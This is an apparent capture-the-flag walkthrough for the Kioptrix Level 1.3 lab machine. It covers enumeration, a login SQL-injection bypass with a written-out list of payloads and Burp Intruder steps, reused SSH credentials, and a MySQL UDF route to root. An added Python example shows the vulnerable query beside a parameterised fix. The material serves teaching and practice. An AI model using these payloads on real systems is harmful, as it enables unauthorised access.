KIOPTRIX: LEVEL 1.3 (#4) Walkthrough

This is similar to the past kioptrix series. Similarly, this is best for beginners. As usual, let me start with a beautiful quote.

“The opportunity of defeating the enemy is provided by the enemy himself.” — Sun Tzu

Enumeration

Let’s start with enumeration…

sudo nmap -p- -T4 -A 192.168.103.183

We have found the running services:

  • ssh
  • http
  • smb

More Enumeration…

1. SSH

This version of SSH does not have any particular vulnerability which we can exploit. However, there is a possible user enumeration weakness available.

2. HTTP

We got a cute goat Pic👻

Nothing sensitive in the source code and no robots.txt.

  • Nikto
Found no possible foothold.

The server reports its software versions as Apache/2.2.8 + PHP/5.2.4.

  • GoBuster
john & robert 🤔…

3. SMB

Nothing interesting here…

Finding POI (Point Of Intrusion)

From the enumeration, I could say that we have a few possible POIs. However, let me first list what is not a possible POI:

  1. SSH — It does not have any exploit available. Possible user enumeration is only a last resort.
  2. SMB — Found nothing sensitive on this.
  3. Apache 2.2.8 and PHP 5.2.4 — No exploits available for this set-up.

Therefore, I could say that the POI will be through the website.

  • LFI / RFI
  • SQLi

Since I found a login page, I will test for SQLi.


Exploitation

I used Burp to test the login form with SQLi payloads.

Payload:

' 
'' 
` 
`` 
, 
" 
"" 
/ 
// 
\ 
\\ 
; 
' or " 
-- or #  
' OR '1 
' OR 1 -- - 
" OR "" = " 
" OR 1 = 1 -- - 
' OR '' = ' 
'=' 
'LIKE' 
'=0--+ 
 OR 1=1 
' OR 'x'='x 
' AND id IS NULL; -- 
'''''''''''''UNION SELECT '2 
%00 
/*…*/

Procedure:

  1. Catch the login request in Burp.
  2. Send it to Intruder and use the Sniper attack type.
  3. Execute and analyse the response length.

I used the creds john:'OR'1

and got into the page…
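The bypass above works because the login query is built by string concatenation, so the quotes in the password turn `AND password=''OR'1'` into an always-true condition. As an added example (not code from the original post), the constructed snippet below recreates that vulnerable query in Python over an in-memory SQLite table (standing in for the site's MySQL backend; the `users(username, password)` schema is an assumption) and sets it beside the parameterised version that a fix would use.

```python
import sqlite3

# Constructed demo database standing in for the site's MySQL backend.
# Assumed schema: users(username, password); not taken from the original post.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")],
    )
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: quotes in user input are parsed as SQL syntax.

    With password "'OR'1" the WHERE clause becomes
    username='john' AND password='' OR '1', which is always true."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def compare(conn, username, password):
    """Return what each login routine does with the same input."""
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "safe": login_safe(conn, username, password),
    }

if __name__ == "__main__":
    db = make_db()
    # The payload from the walkthrough logs in through the vulnerable
    # query but is rejected by the parameterised one.
    print(compare(db, "john", "'OR'1"))
    print(compare(db, "john", "MyNameIsJohn"))
```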

This seems like a password Reuse case.🤔

Let me try the same on SSH…

  • robert:ADGAdsafdfwt4gadfga==
  • john:MyNameIsJohn

John got in…

But, it is a restricted shell…😩

https://www.aldeid.com/wiki/Lshell

Privilege Escalation

I found a UDF (User Defined Function) in MySQL. So I used https://recipeforroot.com/mysql-to-system-root/ to get myself root privileges.


Photo by Fernando Brasil on Unsplash